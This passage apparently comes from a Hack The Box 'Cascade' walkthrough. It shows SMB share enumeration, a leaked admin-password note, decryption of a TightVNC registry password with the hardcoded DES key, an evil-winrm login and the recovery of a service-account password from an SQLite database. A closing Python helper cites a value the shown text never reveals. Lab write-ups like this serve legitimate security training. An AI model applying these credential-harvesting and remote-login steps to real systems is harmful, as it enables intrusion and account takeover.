"cascade.local/Policies/{322FEA29-156D-4476-8A06-1935A3525C1C}/GPT.INI": {
"atime_epoch": "2020-01-09 10:50:16",
"ctime_epoch": "2020-01-09 10:50:16",
"mtime_epoch": "2020-01-28 17:07:51",
"size": "64 B"
},
"cascade.local/Policies/{322FEA29-156D-4476-8A06-1935A3525C1C}/User/Scripts/scripts.ini": {
"atime_epoch": "2020-01-09 14:52:44",
"ctime_epoch": "2020-01-09 14:52:44",
"mtime_epoch": "2020-01-28 17:07:51",
"size": "6 B"
},
"cascade.local/Policies/{4026EDF8-DBDA-4AED-8266-5A04B80D9327}/GPT.INI": {
"atime_epoch": "2020-01-09 14:42:31",
"ctime_epoch": "2020-01-09 14:42:31",
"mtime_epoch": "2020-01-09 14:42:31",
"size": "59 B"
},
"cascade.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
"atime_epoch": "2020-01-09 10:31:40",
"ctime_epoch": "2020-01-09 10:31:40",
"mtime_epoch": "2020-01-26 12:12:15",
"size": "23 B"
},
"cascade.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2020-01-09 10:31:40",
"ctime_epoch": "2020-01-09 10:31:40",
"mtime_epoch": "2020-01-26 12:12:15",
"size": "3.99 KB"
},
"cascade.local/Policies/{820E48A7-D083-4C2D-B5F8-B24462924714}/GPT.INI": {
"atime_epoch": "2020-01-09 13:33:51",
"ctime_epoch": "2020-01-09 13:33:51",
"mtime_epoch": "2020-01-09 13:34:03",
"size": "59 B"
},
"cascade.local/Policies/{D67C2AD5-44C7-4468-BA4C-199E75B2F295}/GPT.INI": {
"atime_epoch": "2020-01-09 14:42:40",
"ctime_epoch": "2020-01-09 14:42:40",
"mtime_epoch": "2020-01-09 14:42:40",
"size": "59 B"
},
"cascade.local/scripts/MapAuditDrive.vbs": {
"atime_epoch": "2020-01-15 16:45:08",
"ctime_epoch": "2020-01-15 16:45:08",
"mtime_epoch": "2020-01-15 16:50:14",
"size": "258 B"
},
"cascade.local/scripts/MapDataDrive.vbs": {
"atime_epoch": "2020-01-15 16:50:28",
"ctime_epoch": "2020-01-15 16:49:19",
"mtime_epoch": "2020-01-15 16:51:03",
"size": "255 B"
}
}
}% jbrown@Jabaris-MacBook-Pro cascade %
When we try grabbing the file directly with netexec, we get an Access Denied.
That usually means one of two things:
So instead of forcing it, we pivot tools.
Let’s use Impacket’s smbclient.py.
This gives us a more interactive SMB session, similar to the traditional smbclient.
jbrown@Jabaris-MacBook-Pro examples % python3 smbclient.py cascade.local/r.thompson:[email protected]
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
# ls
[-] No share selected
# use data
# ls
drw-rw-rw- 0 Tue Jan 28 17:05:51 2020 .
drw-rw-rw- 0 Tue Jan 28 17:05:51 2020 ..
drw-rw-rw- 0 Sun Jan 12 20:45:14 2020 Contractors
drw-rw-rw- 0 Sun Jan 12 20:45:10 2020 Finance
drw-rw-rw- 0 Tue Jan 28 13:04:51 2020 IT
drw-rw-rw- 0 Sun Jan 12 20:45:20 2020 Production
drw-rw-rw- 0 Sun Jan 12 20:45:16 2020 Temps
# cd IT
# ls
drw-rw-rw- 0 Tue Jan 28 13:04:51 2020 .
drw-rw-rw- 0 Tue Jan 28 13:04:51 2020 ..
drw-rw-rw- 0 Tue Jan 28 13:00:30 2020 Email Archives
drw-rw-rw- 0 Tue Jan 28 13:04:51 2020 LogonAudit
drw-rw-rw- 0 Tue Jan 28 19:53:04 2020 Logs
drw-rw-rw- 0 Tue Jan 28 17:06:59 2020 Temp
# cd Email Archives
# ls
drw-rw-rw- 0 Tue Jan 28 13:00:30 2020 .
drw-rw-rw- 0 Tue Jan 28 13:00:30 2020 ..
-rw-rw-rw- 2522 Tue Jan 28 13:00:30 2020 Meeting_Notes_June_2018.html
# get Meeting_Notes_June_2018.html
# exit
jbrown@Jabaris-MacBook-Pro cascade % cat Meeting_Notes_June_2018.html
<html>
<body lang=EN-GB link=blue vlink=purple style='tab-interval:36.0pt'><div class=WordSection1>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>From:<span style='mso-tab-count:
1'>???????????????????????????????????????? </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>Steve Smith
<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>To:<span style='mso-tab-count:
1'>?????????????????????????????????????????????? </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>IT (Internal)<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>Sent:<span style='mso-tab-count:
1'>?????????????????????????????????????????? </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>14 June 2018 14:07<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>Subject:<span
style='mso-tab-count:1'>???????????????????????????????????? </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>Meeting Notes<o:p></o:p></span></p>
<p><o:p> </o:p></p>
<p>For anyone that missed yesterday?s meeting (I?m looking at
you Ben). Main points are below:</p>
<p class=MsoNormal><o:p> </o:p></p>
<p>-- New production network will be going live on
Wednesday so keep an eye out for any issues. </p>
<p>-- We will be using a temporary account to
perform all tasks related to the network migration and this account will be deleted at the end of
2018 once the migration is complete. This will allow us to identify actions
related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). </p>
<p>-- The winner of the ?Best GPO? competition will be
announced on Friday so get your submissions in soon.</p>
<p class=MsoNormal><o:p> </o:p></p>
<p class=MsoNormal>Steve</p>
</div>
</body>
</html>% jbrown@Jabaris-MacBook-Pro cascade %
Out of that entire file, one line stands out:
“Username is TempAdmin (password is the same as the normal admin account password)”
That’s not just a note.
That’s a breadcrumb.
Now we potentially have a privileged account — TempAdmin — but the key detail is that its password matches the “normal admin” account.
Since we already have access to the Data share, let’s comb through everything:
"Data": {
"IT/Email Archives/Meeting_Notes_June_2018.html": {
"atime_epoch": "2020-01-15 20:08:46",
"ctime_epoch": "2020-01-15 20:08:46",
"mtime_epoch": "2020-01-28 13:00:30",
"size": "2.46 KB" <- already got this one
},
"IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log": {
"atime_epoch": "2020-01-10 11:19:20",
"ctime_epoch": "2020-01-10 11:19:20",
"mtime_epoch": "2020-01-28 20:19:11",
"size": "1.27 KB"
},
"IT/Logs/DCs/dcdiag.log": {
"atime_epoch": "2020-01-10 11:17:30",
"ctime_epoch": "2020-01-10 11:17:30",
"mtime_epoch": "2020-01-26 17:22:05",
"size": "5.83 KB"
},
"IT/Temp/s.smith/VNC Install.reg": {
"atime_epoch": "2020-01-28 14:27:43",
"ctime_epoch": "2020-01-28 14:27:43",
"mtime_epoch": "2020-01-28 15:00:01",
"size": "2.62 KB"
}
},
jbrown@Jabaris-MacBook-Pro cascade % cat VNC\ Install.reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
jbrown@Jabaris-MacBook-Pro cascade % cat ArkAdRecycleBin.log
1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD] Validating settings...
1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD] Validating settings...
2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD] Validating settings...
8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0
jbrown@Jabaris-MacBook-Pro cascade % cat dcdiag.log
Directory Server Diagnosis
Performing initial setup:
Trying to find home server...
Home Server = CASC-DC1
* Identified AD Forest.
Done gathering initial info.
Doing initial required tests
Testing server: Default-First-Site-Name\CASC-DC1
Starting test: Connectivity
......................... CASC-DC1 passed test Connectivity
Doing primary tests
Testing server: Default-First-Site-Name\CASC-DC1
Starting test: Advertising
......................... CASC-DC1 passed test Advertising
Starting test: FrsEvent
......................... CASC-DC1 passed test FrsEvent
Starting test: DFSREvent
......................... CASC-DC1 passed test DFSREvent
Starting test: SysVolCheck
......................... CASC-DC1 passed test SysVolCheck
Starting test: KccEvent
......................... CASC-DC1 passed test KccEvent
Starting test: KnowsOfRoleHolders
......................... CASC-DC1 passed test KnowsOfRoleHolders
Starting test: MachineAccount
......................... CASC-DC1 passed test MachineAccount
Starting test: NCSecDesc
......................... CASC-DC1 passed test NCSecDesc
Starting test: NetLogons
......................... CASC-DC1 passed test NetLogons
Starting test: ObjectsReplicated
......................... CASC-DC1 passed test ObjectsReplicated
Starting test: Replications
......................... CASC-DC1 passed test Replications
Starting test: RidManager
......................... CASC-DC1 passed test RidManager
Starting test: Services
......................... CASC-DC1 passed test Services
Starting test: SystemLog
A warning event occurred. EventID: 0x8000001D
Time Generated: 01/10/2020 15:48:14
Event String:
The Key Distribution Center (KDC) cannot find a suitable certificate to use for smart card logons, or the KDC certificate could not be verified. Smart card logon may not function correctly if this problem is not resolved. To correct this problem, either verify the existing KDC certificate using certutil.exe or enroll for a new KDC certificate.
An error event occurred. EventID: 0xC00038D6
Time Generated: 01/10/2020 15:48:43
Event String:
The DFS Namespace service could not initialize cross forest trust information on this domain controller, but it will periodically retry the operation. The return code is in the record data.
A warning event occurred. EventID: 0x000003F6
Time Generated: 01/10/2020 15:48:43
Event String:
Name resolution for the name _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.cascade.local timed out after none of the configured DNS servers responded.
A warning event occurred. EventID: 0x0000000C
Time Generated: 01/10/2020 15:48:43
Event String:
Time Provider NtpClient: This machine is configured to use the domain hierarchy to determine its time source, but it is the AD PDC emulator for the domain at the root of the forest, so there is no machine above it in the domain hierarchy to use as a time source. It is recommended that you either configure a reliable time service in the root domain, or manually configure the AD PDC to synchronize with an external time source. Otherwise, this machine will function as the authoritative time source in the domain hierarchy. If an external time source is not configured or used for this computer, you may choose to disable the NtpClient.
A warning event occurred. EventID: 0x000727AA
Time Generated: 01/10/2020 15:50:52
Event String:
The WinRM service failed to create the following SPNs: WSMAN/CASC-DC1.cascade.local; WSMAN/CASC-DC1.
......................... CASC-DC1 failed test SystemLog
Starting test: VerifyReferences
......................... CASC-DC1 passed test VerifyReferences
Running partition tests on : ForestDnsZones
Starting test: CheckSDRefDom
......................... ForestDnsZones passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... ForestDnsZones passed test
CrossRefValidation
Running partition tests on : DomainDnsZones
Starting test: CheckSDRefDom
......................... DomainDnsZones passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... DomainDnsZones passed test
CrossRefValidation
Running partition tests on : Schema
Starting test: CheckSDRefDom
......................... Schema passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... Schema passed test CrossRefValidation
Running partition tests on : Configuration
Starting test: CheckSDRefDom
......................... Configuration passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... Configuration passed test CrossRefValidation
Running partition tests on : cascade
Starting test: CheckSDRefDom
......................... cascade passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... cascade passed test CrossRefValidation
Running enterprise tests on : cascade.local
Starting test: LocatorCheck
......................... cascade.local passed test LocatorCheck
Starting test: Intersite
......................... cascade.local passed test Intersite
jbrown@Jabaris-MacBook-Pro cascade %
If it looks like a password in hex format, that’s another strong indicator we’re dealing with encoding — not hashing.
Hex is just representation.
If the string only contains characters 0-9 and a-f (and the length makes sense), there’s a good chance it’s simply hex-encoded data.
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
After doing a little research (with some AI help), I learned that the VNC product line uses the same hardcoded DES key across multiple versions.
Which means if we find a VNC‑encrypted password, we don’t crack it.
We decrypt it.
That hex value we found? Very likely a VNC password.
Shoutout to the researchers who documented this — makes life a lot easier.
More can be found in this GitHub README, which gives a simple explanation and example: https://github.com/frizb/PasswordDecrypts/blob/master/README.md
jbrown@Jabaris-MacBook-Pro cascade % echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d -provider legacy -provider default | hexdump -Cv
00000000  73 54 33 33 33 76 65 32  |sT333ve2|
00000008
jbrown@Jabaris-MacBook-Pro cascade %
Now that we have the password, we can attempt to log in via evil-winrm.
This time it should work.
Why?
Because Steve is a member of the Remote Management Users group, which grants WinRM access.
cn: Steve Smith
sn: Smith
givenName: Steve
distinguishedName: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109180813.0Z
whenChanged: 20200323113113.0Z
displayName: Steve Smith
uSNCreated: 16404
memberOf: CN=Audit Share,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295015
name: Steve Smith
objectGUID: 39nrOPfEAE2an/UDQy/6fQ==
Grab the user flag:
jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.42.114 -u s.smith -p sT333ve2
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\s.smith\Documents>
*Evil-WinRM* PS C:\Users\s.smith\Documents> dir
*Evil-WinRM* PS C:\Users\s.smith\Documents> cd ..
*Evil-WinRM* PS C:\Users\s.smith> dir
Directory: C:\Users\s.smith
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 3/25/2020 11:17 AM Desktop
d-r--- 1/13/2020 3:36 AM Documents
d-r--- 7/14/2009 3:34 AM Downloads
d-r--- 7/14/2009 3:34 AM Favorites
d-r--- 7/14/2009 3:34 AM Links
d-r--- 7/14/2009 3:34 AM Music
d-r--- 7/14/2009 3:34 AM Pictures
d----- 7/14/2009 3:34 AM Saved Games
d-r--- 7/14/2009 3:34 AM Videos
*Evil-WinRM* PS C:\Users\s.smith> cd Desktop
*Evil-WinRM* PS C:\Users\s.smith\Desktop> dir
Directory: C:\Users\s.smith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/2/2026 12:00 AM 34 user.txt
-a---- 2/4/2021 4:24 PM 1031 WinDirStat.lnk
*Evil-WinRM* PS C:\Users\s.smith\Desktop> type user.txt
***UserFlagFoundHere*****
*Evil-WinRM* PS C:\Users\s.smith\Desktop>
User flag secured.
Now it’s time for the admin flag.
We already have the TempAdmin credentials in our back pocket, but before jumping straight to that, we enumerate again.
Post-exploitation is still enumeration — just from the inside now.
The good thing is we already did a lot of LDAP recon earlier, so we’re not starting from scratch.
Now that we’re on the box as s.smith, we take a closer look at the environment.
And something stands out.
There’s a script that runs every time this user logs in.
cn: Steve Smith
sn: Smith
givenName: Steve
distinguishedName: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109180813.0Z
whenChanged: 20200323113113.0Z
displayName: Steve Smith
uSNCreated: 16404
memberOf: CN=Audit Share,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295015
name: Steve Smith
objectGUID: 39nrOPfEAE2an/UDQy/6fQ==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247275952778272
lastLogoff: 0
lastLogon: 132247275990842339
scriptPath: MapAuditDrive.vbs <- HERE
pwdLastSet: 132247150854857364
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFUwQAAA==
accountExpires: 9223372036854775807
logonCount: 16
sAMAccountName: s.smith
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200109180813.0Z
dSCorePropagationData: 16010101000417.0Z
lastLogonTimestamp: 132294366735115088
We already saw that script earlier in the SYSVOL share, so this isn’t new — we just didn’t fully analyze it.
Now that we’re on the box, it makes sense to grab it and take a closer look.
python3 smbclient.py cascade.local/r.thompson:[email protected]
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use SYSVOL
# ls
drw-rw-rw- 0 Thu Jan 9 10:31:27 2020 .
drw-rw-rw- 0 Thu Jan 9 10:31:27 2020 ..
drw-rw-rw- 0 Thu Jan 9 10:31:27 2020 cascade.local
# cd cascade.local
# ls
drw-rw-rw- 0 Thu Jan 9 10:33:07 2020 .
drw-rw-rw- 0 Thu Jan 9 10:33:07 2020 ..
drw-rw-rw- 0 Tue Mar 3 07:53:20 2026 DfsrPrivate
drw-rw-rw- 0 Thu Jan 9 14:42:40 2020 Policies
drw-rw-rw- 0 Wed Jan 15 16:50:33 2020 scripts
# cd scripts
# ls
drw-rw-rw- 0 Wed Jan 15 16:50:33 2020 .
drw-rw-rw- 0 Wed Jan 15 16:50:33 2020 ..
-rw-rw-rw- 258 Wed Jan 15 16:50:14 2020 MapAuditDrive.vbs
-rw-rw-rw- 255 Wed Jan 15 16:51:03 2020 MapDataDrive.vbs
# get MapAuditDrive.vbs
# get MapDataDrive.vbs
#
Looking at the script closely now.
'MapAuditDrive.vbs
Option Explicit
Dim oNetwork, strDriveLetter, strRemotePath
strDriveLetter = "F:"
strRemotePath = "\\CASC-DC1\Audit$"
Set oNetwork = CreateObject("WScript.Network")
oNetwork.MapNetworkDrive strDriveLetter, strRemotePath
WScript.Quit
'MapDataDrive.vbs
Option Explicit
Dim oNetwork, strDriveLetter, strRemotePath
strDriveLetter = "O:"
strRemotePath = "\\CASC-DC1\Data"
Set oNetwork = CreateObject("WScript.Network")
oNetwork.MapNetworkDrive strDriveLetter, strRemotePath
WScript.Quit
We can see the script is mapping a drive to a remote Audit path.
Let’s use netexec again — this time authenticated — to see which shares this account can read:
jbrown@Jabaris-MacBook-Pro examples % nxc smb 10.129.42.114 -u s.smith -p sT333ve2 -M spider_plus
SMB 10.129.42.114 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.42.114 445 CASC-DC1 [+] cascade.local\s.smith:sT333ve2
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] STATS_FLAG: True
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] OUTPUT_FOLDER: /Users/jbrown/.nxc/modules/nxc_spider_plus
SMB 10.129.42.114 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.42.114 445 CASC-DC1 Share Permissions Remark
SMB 10.129.42.114 445 CASC-DC1 ----- ----------- ------
SMB 10.129.42.114 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.42.114 445 CASC-DC1 Audit$ READ
SMB 10.129.42.114 445 CASC-DC1 C$ Default share
SMB 10.129.42.114 445 CASC-DC1 Data READ
SMB 10.129.42.114 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.42.114 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.129.42.114 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.42.114 445 CASC-DC1 SYSVOL READ Logon server share
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [+] Saved share-file metadata to "/Users/jbrown/.nxc/modules/nxc_spider_plus/10.129.43.159.json".
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] SMB Shares: 8 (ADMIN$, Audit$, C$, Data, IPC$, NETLOGON, print$, SYSVOL)
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] SMB Readable Shares: 5 (Audit$, Data, NETLOGON, print$, SYSVOL)
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] Total folders found: 61
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] Total files found: 28
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] File size average: 122.39 KB
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] File size min: 6 B
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] File size max: 1.56 MB
jbrown@Jabaris-MacBook-Pro examples %
Compared to r.thompson, we actually have read permission on the Audit share with s.smith.
r.thompson:
SMB Readable Shares: 4 (Data, NETLOGON, print$, SYSVOL)
vs
s.smith:
SMB Readable Shares: 5 (Audit$, Data, NETLOGON, print$, SYSVOL)
Now let’s connect to the Audit drive directly and see what’s inside.
jbrown@Jabaris-MacBook-Pro examples % python3 smbclient.py cascade.local/s.smith:[email protected]
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Audit$
# ls
drw-rw-rw- 0 Wed Jan 29 13:01:26 2020 .
drw-rw-rw- 0 Wed Jan 29 13:01:26 2020 ..
-rw-rw-rw- 13312 Tue Jan 28 16:47:08 2020 CascAudit.exe
-rw-rw-rw- 12288 Wed Jan 29 13:01:26 2020 CascCrypto.dll
drw-rw-rw- 0 Tue Jan 28 16:43:18 2020 DB
-rw-rw-rw- 45 Tue Jan 28 18:29:47 2020 RunAudit.bat
-rw-rw-rw- 363520 Tue Jan 28 15:42:18 2020 System.Data.SQLite.dll
-rw-rw-rw- 186880 Tue Jan 28 15:42:18 2020 System.Data.SQLite.EF6.dll
drw-rw-rw- 0 Tue Jan 28 15:42:18 2020 x64
drw-rw-rw- 0 Tue Jan 28 15:42:18 2020 x86
# cd DB
# ls
drw-rw-rw- 0 Tue Jan 28 16:43:18 2020 .
drw-rw-rw- 0 Tue Jan 28 16:43:18 2020 ..
-rw-rw-rw- 24576 Tue Jan 28 16:43:18 2020 Audit.db
An Audit.db file — and if it’s SQLite, that’s even better for us.
SQLite databases are file-based, which means:
jbrown@Jabaris-MacBook-Pro cascade % sqlite3 Audit.db
SQLite version 3.43.2 2023-10-10 13:08:14
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite> .schema Ldap
CREATE TABLE IF NOT EXISTS "Ldap" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"uname" TEXT,
"pwd" TEXT,
"domain" TEXT
);
sqlite> SELECT * FROM Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite>
So we found the password for the ArkSvc user, and it looks to be Base64 encoded.
All we have to do is decode it from the command line.
jbrown@Jabaris-MacBook-Pro cascade % echo "BQO5l5Kj9MdErXx6Q6AGOw==" | base64 -d
??????D?|zC?;%
Alright — if the decoded value still looks encoded, no problem.
We pivot back to enumeration.
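The two rules of thumb used so far (the hex-versus-hash check from the VNC password earlier, and "if the Base64 decodes to junk it is probably ciphertext, not plaintext") are easy to turn into a small triage helper. The following is an added example written for this walkthrough, not code from the original post. The digest-length table is my own, the MD5-length sample string is a constructed input, and the three tokens from the box are the ones quoted in the text.

```python
import base64
import re
import string

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# Hex lengths of common unsalted digests: a hex token of exactly this size is
# more likely a hash (something to crack) than encoded data (something to decode).
DIGEST_HEX_LENGTHS = {32: "MD5/NTLM", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}
# "Readable" means printable ASCII plus a plain space; tabs/newlines are excluded.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def is_printable(data):
    return bool(data) and all(b in PRINTABLE for b in data)


def triage(token):
    """Classify a recovered token as hex, Base64 or unknown and decode it when possible."""
    # Normalise registry-style dumps: "Password"=hex:6b,cf,2a,... -> 6bcf2a...
    token = re.sub(r"^hex:", "", token.strip(), flags=re.I).replace(",", "")
    verdict = {"kind": "unknown", "decoded": None, "printable": False, "digest_guess": None}
    # Hex is checked first: a string like "deadbeef" is valid in both alphabets.
    if HEX_RE.match(token) and len(token) % 2 == 0:
        verdict.update(kind="hex", decoded=bytes.fromhex(token),
                       digest_guess=DIGEST_HEX_LENGTHS.get(len(token)))
    elif B64_RE.match(token) and len(token) % 4 == 0:
        try:
            verdict.update(kind="base64", decoded=base64.b64decode(token, validate=True))
        except ValueError:
            return verdict
    if verdict["decoded"] is not None:
        verdict["printable"] = is_printable(verdict["decoded"])
    return verdict


def next_step(verdict):
    """One-line recommendation: decode, decrypt or crack."""
    if verdict["kind"] == "unknown":
        return "not hex or Base64: look at it in context before guessing"
    if verdict["digest_guess"]:
        return "length matches a %s digest: this is a hash, crack it" % verdict["digest_guess"]
    if verdict["printable"]:
        return "decodes to readable text: it was only encoded"
    return "decodes to binary: probably ciphertext, look for the key and algorithm"


if __name__ == "__main__":
    for sample in ('"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f'.split("=", 1)[1],
                   "BQO5l5Kj9MdErXx6Q6AGOw==", "YmFDVDNyMWFOMDBkbGVz"):
        v = triage(sample)
        print(sample, "->", v["kind"], v["decoded"], "|", next_step(v))
```

Run against the three values from this box it reports the VNC string and the ArkSvc value as binary (so: find the key), and the TempAdmin value as readable text (so: it was only Base64). The digest-length check is a heuristic only; a 32-character hex string can still be 16 bytes of encrypted data, which is why the decoded bytes are returned alongside the guess.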
